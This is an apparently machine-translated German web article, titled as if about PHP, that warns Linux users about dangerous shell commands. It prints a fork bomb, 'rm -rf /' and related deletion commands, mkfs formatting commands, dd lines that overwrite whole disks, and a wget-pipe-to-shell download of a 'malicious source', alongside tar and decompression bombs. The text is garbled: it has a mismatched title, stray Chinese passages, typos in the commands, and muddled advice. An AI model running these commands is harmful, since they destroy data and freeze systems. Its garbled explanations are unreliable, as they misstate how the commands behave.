Heim > Artikel > Backend-Entwicklung > 9 PHP-Befehle und -Codes, auf die Sie immer achten müssen
Linux-Shell-/Terminal-Befehle sind sehr leistungsfähig, selbst ein einfacher Befehl kann dazu führen, dass Ordner, Dateien oder Pfadordner gelöscht werden.
In einigen Fällen fragt Linux Sie nicht einmal danach und führt den Befehl direkt aus, wodurch verschiedene Dateninformationen verloren gehen.
Generell wird neuen Linux-Benutzern empfohlen, diese Befehle im Web auszuführen. Natürlich gibt es auch Leute, die diesen Code geschrieben haben, die das nicht glauben, denn das ist kein Witz mehr du schreibst es auf.
Hier habe ich einige systemschädliche Linux-Codes zusammengestellt, damit Sie sie vermeiden können. Denken Sie daran: Dieser Code ist sehr gefährlich und kann sogar geändert werden, um noch schädlicher zu werden.
Noch etwas zu beachten: Einige Befehle sind nur dann schädlich, wenn sie in Ubuntu das Präfix sudo haben. Andere Linux-Distributionen können schädlich sein, wenn sie als Root-Verzeichnisbefehle verwendet werden.
1. Linux Fork Bomb Command
:(){ :|: & };: Bekannt als Fork Bomb, handelt es sich um einen Denial-of-Service-Angriff auf das Linux-System. :(){ :|: & };: ist eine Bash-Funktion. Solange es ausgeführt wird, wird es wiederholt, bis das System einfriert.
Sie können dieses Problem nur durch einen Neustart des Systems lösen. Seien Sie also unbedingt aufmerksam, wenn Sie diesen Befehl auf der Linux-Schnittstelle ausführen.
2. Mv-Ordner/Dev/Null-Befehl
mv-Ordner/dev/null ist ebenfalls ein gefährlicher Befehl. Dev/Null oder Nullgerät ist eine Gerätedatei, die alle in diese Gerätedatei geschriebenen Daten löscht. Die Eingabeaufforderung für den Vorgang lautet jedoch, dass der Schreibvorgang erfolgreich ausgeführt wurde. Dies ist es, was wir oft als „bit bucked“ oder „schwarzes Loch“ bezeichnen.
3. Rm -Rf-Befehl
Der Befehl rm -rf kann Ordner und deren Inhalte in Linux-Systemen schnell löschen. Wenn Sie nicht wissen, wie man es richtig verwendet, werden Sie nur weinen.
Listen Sie die häufigsten Kombinationen und Auswahlmöglichkeiten von m-rf-Befehlen auf:
rm command :删除Linux系统的文件 rm -f command:不需提示,删除文件中的只读文件 rm -r command 循环删除文件夹的内容 rm -d command :删除空目录,如果非空目录则不会执行该操作 rm -rf/ command:强制删除根目录中的所有内容和子文件夹(包括写保护文件)命令。 rm -rf* command :强制删除当前目录中的所有内容(当前工作目录)和字文件夹 rm -rf. command:强制删除当前文件夹目录/子目录中的所有内容 。同rm -r.[^.]* The rm -r.[^.]* command :删除文件及文件夹,带有删除提示
4. Mkfs-Befehl
Wenn Sie die Funktion von mkfs nicht kennen, dann Es ist auch ein gefährlicher Befehl. Jeder Befehl, der nach mkfs geschrieben wird, wird formatiert und durch ein leeres Linux-Dateisystem ersetzt.
Für die folgenden Befehle sind Administratorrechte erforderlich, um die Festplatte zu formatieren:
mkfs mkfs.ext3 mkfs.bfs mkfs.ext2 mkfs.minix mkfs.msdos mkfs.reiserfs mkfs.vfat
mkfs.cramfs kann das Gleiche wie der obige Code tun, erfordert jedoch keine administrative Quelle Rechte.
5. Tar Bomb
Der tar-Befehl wird verwendet, um mehrere Dateien in einer Datei (Archivdatei) im .tar-Format zusammenzufassen. Eine Tape Archive (Tar)-Bombe kann von ihm erstellt werden.
Bei der Komprimierung ist es diese Archivdatei, die Zehntausende ähnlich benannte Dateien generiert, die im aktuellen Verzeichnis statt in einem neuen Verzeichnis angezeigt werden.
Wenn Sie eine TAR-Datei erhalten, erstellen Sie regelmäßig ein neues geschütztes Verzeichnis und legen Sie die empfangene TAR-Datei dann vor der Dekomprimierung in diesem Verzeichnis ab. So können Sie vermeiden, Opfer einer Teerbombe zu werden.
6. Dd-Befehl
Der Dd-Befehl wird zum Kopieren und Ändern von Festplattenpartitionen verwendet. Wenn Sie es an der falschen Stelle verwenden, kann es gefährlich sein.
Der dd-Befehl ist unten aufgeführt:
dd if=/dev/hda of=/dev/hdb dd if=/dev/hda of=/dev/sdb dd if=something of=/dev/hda dd if=something of=/dev/sda
Der folgende Befehl löscht die gesamte Hauptfestplatte: dd if=/dev/zero of=/dev/had
7. Shell-Skriptcode
Manchmal werden Sie ausgetrickst und erhalten eine Shell-Skriptdatei zum Herunterladen und Ausführen. Das Skript kann schädlichen oder gefährlichen Code enthalten. Die Befehlsform könnte wie folgt aussehen: wget http://some_malicious_source -O- |. wget lädt das Skript herunter, wenn das Skript eingeschränkt wird.
8. Schädlicher Quellcode
Vielleicht gibt Ihnen jemand den Quellcode und lässt Sie ihn kompilieren. Bei dem Code kann es sich um normalen Code handeln, es kann jedoch sein, dass im großen Quellcode bösartiger Code versteckt ist. Wenn dies der Fall ist, ist Ihr System angreifbar. Wie kann man das vermeiden? Akzeptieren und kompilieren Sie Quellcode nur aus vertrauenswürdigen Quellen.
9. Dekompressionsbombe
Sie haben eine komprimierte Datei erhalten und wurden gebeten, diese scheinbar kleine Datei zu extrahieren, möglicherweise nur KB. Tatsächlich enthält die geringe Größe der komprimierten Datei stark komprimierte Daten.
Solange die Datei dekomprimiert ist, werden Hunderte GB an Daten extrahiert. Zu diesem Zeitpunkt ist die Wahrscheinlichkeit sehr hoch, dass übermäßig große Daten die Festplatte füllen und Ausfallzeiten verursachen. Wie kann man das vermeiden? Wie das alte Sprichwort sagt: Seien Sie nicht geizig, akzeptieren Sie Dokumente von vertrauenswürdigen Quellen.